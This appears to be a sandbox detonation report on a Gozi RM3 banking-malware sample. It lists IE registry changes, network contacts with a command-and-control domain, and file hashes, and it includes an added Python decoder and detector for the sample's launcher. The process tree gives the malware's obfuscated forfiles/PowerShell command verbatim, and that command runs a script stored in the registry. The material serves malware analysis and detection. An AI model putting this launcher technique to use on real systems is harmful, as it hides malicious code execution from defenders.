Analysis Overview
SHA256
7a381baee55dabd578bf198e4680d98d3057142cff19713612fc4bfa1ae39369
Threat Level: Known bad
The file 6175910434340864.zip was found to be: Known bad.
Malicious Activity Summary
Gozi RM3
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2022-03-16 16:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-16 16:30
Reported
2022-03-16 16:33
Platform
win7-20220310-en
Max time kernel
4294217s
Max time network
163s
Command Line
Signatures
Gozi RM3
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0da9aef5b39d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000502621f4dee5e4c660c0a33665ed927bca546ed54d6d262de5b17e05ec31b93d000000000e80000000020000200000003923311a96764a154049d6de00214f5487c71adfc4bce1d0a364f56729217d11200000001d9984fda5041a6ce95fa0c63293f5ad3a61d35ee4a453dac1d8c6357422f45740000000862082c8e2ecb82934413be4f7f603715ac4f6b4b7b123c904145de6064fed3bbab776e2808428c1c06a75ec1184c41e5093c5459410818153137070c11bd3b5 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "354216919" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F743E201-A54E-11EC-92D3-FED163790235} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\bca43b8251b1c4ac499b1d0543a86aee4fd76da1e203f011f0f1e68a03844820.exe
"C:\Users\Admin\AppData\Local\Temp\bca43b8251b1c4ac499b1d0543a86aee4fd76da1e203f011f0f1e68a03844820.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1376 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1376 CREDAT:1717252 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
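The cmd.exe/forfiles pair above is the sample's PowerShell launcher: forfiles walks C:\Windows\system32 recursively (/s) for a file matching the mask po*l.e*e, which on a stock install resolves to powershell.exe under WindowsPowerShell\v1.0, and runs it through cmd /k @path -ec <base64>, so the string "powershell" never appears in the process command line. The Python below is an editor's example added to this page, not part of the sandbox report: it decodes the -ec argument (base64 over UTF-16LE, not UTF-8), emulates the /p, /s and /m selection against a constructed System32 listing, and lists the detection reasons. The decoded payload is iex (gp 'HKCU:\Software\Modearchive').S, i.e. the script body is read from a registry value under HKCU:\Software\Modearchive; the report does not show the registry write that stores it, and whether the property name shown ("S") is complete or was truncated by the sandbox cannot be determined from this page. Function names and the directory listing are the editor's own.

```python
import base64
import fnmatch
import re

# The forfiles command line exactly as recorded in the behavioral1 process tree above.
FORFILES_CMDLINE = (
    'forfiles /c "cmd /k @path -ec '
    'aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA'
    ' & exit" /p C:\\Windows\\system32 /s /m po*l.e*e'
)

# Constructed stand-in for a System32 directory listing (not from the report). It only
# needs the real location of powershell.exe plus a few decoys to show what the glob hits.
SAMPLE_SYSTEM32_FILES = [
    r"C:\Windows\system32\notepad.exe",
    r"C:\Windows\system32\poqexec.exe",
    r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe",
]

_EC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_OPT_RE = re.compile(r"/(p|m)\s+(\S+)", re.IGNORECASE)
_S_RE = re.compile(r"\s/s(?=\s|$)", re.IGNORECASE)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE; decoding as UTF-8 gives NUL-spaced garbage."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def parse_forfiles(cmdline: str) -> dict:
    """Split a forfiles launcher into search root (/p), recursion (/s), file mask (/m)
    and the PowerShell payload hidden behind -ec inside the /c command string."""
    opts = {k.lower(): v for k, v in _OPT_RE.findall(cmdline)}
    ec = _EC_RE.search(cmdline)
    return {
        "root": opts.get("p", "."),
        "recursive": bool(_S_RE.search(cmdline)),
        "mask": opts.get("m", "*"),
        "encoded": ec.group(1) if ec else None,
        "decoded": decode_encoded_command(ec.group(1)) if ec else None,
    }


def resolve_mask(parsed: dict, listing: list) -> list:
    """Emulate forfiles' file selection over a directory snapshot: keep paths under the
    /p root (descending into subdirectories only when /s was given) and apply the /m
    glob to the file name. Comparison is case-insensitive, as on NTFS."""
    root = parsed["root"].lower().rstrip("\\") + "\\"
    hits = []
    for path in listing:
        low = path.lower()
        if not low.startswith(root):
            continue
        rel = low[len(root):]
        if not parsed["recursive"] and "\\" in rel:
            continue
        if fnmatch.fnmatchcase(rel.rsplit("\\", 1)[-1], parsed["mask"].lower()):
            hits.append(path)
    return hits


def lolbin_findings(cmdline: str) -> list:
    """Detection view: the reasons this forfiles invocation should page an analyst."""
    p = parse_forfiles(cmdline)
    findings = []
    if re.search(r"@path\s+-(?:encodedcommand|enc|ec|e)\b", cmdline, re.IGNORECASE):
        findings.append("forfiles /c runs the matched file (@path) with a PowerShell -EncodedCommand")
    if any(ch in p["mask"] for ch in "*?") and p["mask"] != "*":
        findings.append(f"wildcard mask {p['mask']!r} keeps the target binary name off the command line")
    if p["decoded"]:
        if re.search(r"\biex\b|invoke-expression", p["decoded"], re.IGNORECASE):
            findings.append("decoded payload feeds text to iex / Invoke-Expression")
        if re.search(r"\bgp\b|get-itemproperty", p["decoded"], re.IGNORECASE):
            findings.append("decoded payload reads its script body from a registry value")
    return findings


if __name__ == "__main__":
    parsed = parse_forfiles(FORFILES_CMDLINE)
    print("decoded -ec payload:", parsed["decoded"])
    print("/m resolves to:", resolve_mask(parsed, SAMPLE_SYSTEM32_FILES))
    for f in lolbin_findings(FORFILES_CMDLINE):
        print("-", f)
```

In telemetry this shows up as a forfiles.exe process whose child is cmd.exe spawning powershell.exe with -ec; matching on "forfiles" plus "@path" plus an EncodedCommand switch catches the launcher regardless of the mask used, which is the point of decoding rather than string-matching the binary name.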
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/1824-54-0x000000000030E000-0x0000000000319000-memory.dmp
memory/1824-55-0x000000000030E000-0x0000000000319000-memory.dmp
memory/1824-56-0x00000000001B0000-0x00000000001BC000-memory.dmp
memory/1824-57-0x00000000759C1000-0x00000000759C3000-memory.dmp
memory/1824-58-0x0000000001000000-0x000000000106F000-memory.dmp
memory/1824-59-0x00000000001C0000-0x00000000001D0000-memory.dmp
memory/1824-65-0x00000000001F0000-0x00000000001F2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8dbe65040c7318b8462f79e56017594e |
| SHA1 | 4b51033360ddfef8ca0941addd60c162f618387a |
| SHA256 | c32824406974106533f3de5f86384302c582e83287571f36df0909457acbcbbe |
| SHA512 | 1bf2e8a9ea47fbe330a141c806bbc17078911a2a45c36c902179014fd59c4aaa88a0a45e290d716e5d06385d58f73ab72555c34822a44a6c10f936a34b093b21 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 54e9306f95f32e50ccd58af19753d929 |
| SHA1 | eab9457321f34d4dcf7d4a0ac83edc9131bf7c57 |
| SHA256 | 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72 |
| SHA512 | 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | 65a0eb052cf68845a784b0d2c1a97f96 |
| SHA1 | 1902a40bc4fc63ecce5b1bcdf7634d8a325b6aea |
| SHA256 | 2fd7c28df0ed3c1897d4a7fff3068b40304b37daddf3031ffd6d863653d4c02d |
| SHA512 | f78001c1ecb38b4f05aae055f7fa42560d208d8412d9c90efa8a234cd4629e7297e0c5fa8f312254ac9df350a43d1dc1c7e46f8a6d5e804548b0896321a34928 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat
| MD5 | a3f73d3a60f4be84c4e27d6994abe16b |
| SHA1 | 0baa602a468904327a6f2fdfddfa12259c5e3e7a |
| SHA256 | f288c3789c35db67f27299a4583013f6e6b5af1528c7b5e1587a637890b3e242 |
| SHA512 | fdbde558da7d56f7bb7d4f899d77fca14d08a72a218b062a24d2e080cf744bf481fb90bc9cb1be00c0237f068878e60724f73978aef3b82a74e486ea85fb8f85 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OL83HNN\favicon[1].ico
| MD5 | a976d227e5d1dcf62f5f7e623211dd1b |
| SHA1 | a2a9dc1abdd3d888484678663928cb024c359ee6 |
| SHA256 | 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271 |
| SHA512 | 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ed9990235f2898c87291691a776262d4 |
| SHA1 | 6dba7cede1f993610fa6f05ab497f62f9e899c01 |
| SHA256 | 54a4dc682d1aadf52ef00e3ed6f1f49ff01bbec79fa0320d919778c0b0329354 |
| SHA512 | 997e63e0e099e0593c7b40ea140e76ac083add68813ae4745a2f558fdaaa3a5b0ddc42c0f509ea7b08579ed80af7dc5fa12bf5611f8b521116e1b57857de0484 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\W9L00R8P.txt
| MD5 | 337da72421b1a9617fee0412671b29aa |
| SHA1 | 463cae18081382950c00a54b208a3859f441dc3e |
| SHA256 | 4dadc8fd0555db473bdd76315881591c8800125bff589a730119952d10e54fb3 |
| SHA512 | e30f12291f3899f5cbe9e0420079cfa8255f69a9c6cefa9087d0e4dd033cdfcecc08c3b0a0f2a48a0750a5d2cf9bb930a7f646c94e2988892675cc89407084c9 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-16 16:30
Reported
2022-03-16 16:34
Platform
win10v2004-20220310-en
Max time kernel
168s
Max time network
181s
Command Line
Signatures
Gozi RM3
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e06236035c39d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4227150718" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9013ed045c39d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
